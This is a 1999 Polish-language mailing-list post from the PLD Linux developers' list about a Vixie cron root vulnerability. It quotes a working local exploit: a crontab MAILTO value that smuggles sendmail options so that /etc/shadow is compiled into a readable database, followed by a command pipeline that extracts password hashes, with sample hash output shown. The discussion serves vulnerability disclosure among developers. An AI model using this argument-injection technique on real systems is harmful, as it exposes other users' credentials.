crontab root exploit
Jan Rekorajski
baggins w pld.org.pl
Sob, 28 Sie 1999, 16:22:00 CEST
[poniedziałek, 05 lipiec 1999], Michal Zalewski napisał(a):
> On Fri, 27 Aug 1999, Lukasz Trabinski wrote:
>
> > Hmm, jesli masz exploita, to IMHO wystarczy sprawdzic? ;) Ewentualnie
> > jesli ktos czyms takim dysponuje (gotowym exploitem), moge sie
> > poswiecic i potestowac... ;-) Na pisanie wlasnych exploitow na razie
> > nie mam zabardzo czasu. ;(
>
> Byloby na przyklad:
>
> [lcamtuf w onehost lcamtuf]$ crontab -l
> MAILTO='-bi -O AliasFile=/etc/shadow'
>
> * * * * * nonexistent
> [lcamtuf w onehost lcamtuf]$ sleep 60
> [lcamtuf w onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F:
> '$2==""{print " - " $1
> }$2!=""{printf $1}'|grep -v '*'
> I15hybS.C.S1. - lcamtuf
> hA/p45.MNqAtO - root
> YoYwL/aBGnfAsRQ - testy
>
> oczywiscie vixie.
>
A hc-cron?
Janek
--
Jan Rękorajski | ALL SUSPECTS ARE GUILTY. PERIOD!
baggins<at>mimuw.edu.pl | OTHERWISE THEY WOULDN'T BE SUSPECTS, WOULD THEY?
BOFH, type MANIAC | -- TROOPS by Kevin Rubio
Więcej informacji o liście dyskusyjnej pld-devel-pl